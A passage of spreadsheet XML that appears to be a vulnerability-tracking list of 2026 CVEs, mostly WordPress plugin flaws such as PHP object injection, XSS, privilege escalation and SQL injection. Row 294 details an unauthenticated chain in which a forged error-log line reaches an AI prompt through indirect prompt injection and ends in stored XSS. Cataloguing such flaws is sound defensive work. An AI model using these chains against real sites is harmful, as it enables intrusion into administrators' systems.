      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94122</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Responsive Slider Gallery  &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94122</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94677</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Kadence WooCommerce Email Designer &lt;= 1.5.19.1 versions.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94677</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96343</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96343</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96344</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in eCommerce Product Catalog &lt;= 3.6.0 versions.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96344</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96561</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>The AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.8.0 This is due to a chain of missing input neutralization and output escaping across the /mwai-ui/v1/chats/submit REST endpoint, the PHP error-log parser (MeowKit_MWAI_Helpers::php_error_logs), the Advisor task (Meow_MWAI_Modules_Advisor::run_advisor), and the Advisor dashboard widget (advisor_metabox): the server-parameter denylist in chat_submit strips only exact key names such as 'model' while convert_keys() later canonicalizes 'model_' back to 'model', allowing an unauthenticated caller to place an attacker-controlled string (including CR/LF) into $query-&gt;model; final_checks() throws an Exception whose message embeds that raw string, and the non-streaming, non-admin catch branch writes it to the PHP error log unmodified — creating a forged log line that the plugin's own parser subsequently returns as recent PHP-error content; run_advisor() then appends that content verbatim to the AI prompt (indirect prompt injection — CWE-1427), the returned JSON is stored in the mwai_advisor_data option with no schema validation or HTML sanitization, and advisor_metabox() concatenates the resulting 'title' and 'description' values directly into the WordPress dashboard widget without esc_html(), wp_kses(), or equivalent escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the WordPress dashboard.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96561</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96815</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>Custom role Privilege Escalation in Vitepos &lt;= 3.5.0 versions.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96815</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96832</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Content Egg &lt;= 6.3.1 versions.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96832</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96833</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Ultimate Addons for Contact Form 7 &lt;= 3.5.51 versions.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96833</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97245</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Shop Worker Privilege Escalation in SureCart &lt;= 4.7.2 versions.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97245</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97256</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Page Builder by SiteOrigin &lt;= 2.36.0 versions.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97256</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97347</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>The Post Views Stats Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The plugin's only input filter is a substring blacklist for known bot signatures (e.g. 'bot', 'spider', 'crawler'), which can be trivially bypassed by crafting a User-Agent payload that omits those strings.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97347</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100507</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in If-So Dynamic Content Personalization &lt;= 1.10.1 versions.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100507</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100510</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Post and Page Builder by BoldGrid &lt;= 1.27.14 versions.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100510</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102109</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability existed in Kiteworks Secure Data Forms, where a value derived from the authenticated user's stored account data was incorporated into a database query without proper sanitization. An authenticated user could potentially influence that value to inject SQL. Exploitation requires an authenticated session and applies only to deployments where a specific optional feature is in use.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102109</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102376</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Branda &lt;= 3.4.32 versions.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102376</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102385</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ninja Forms &lt;= 3.15.3 versions.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102385</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102391</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
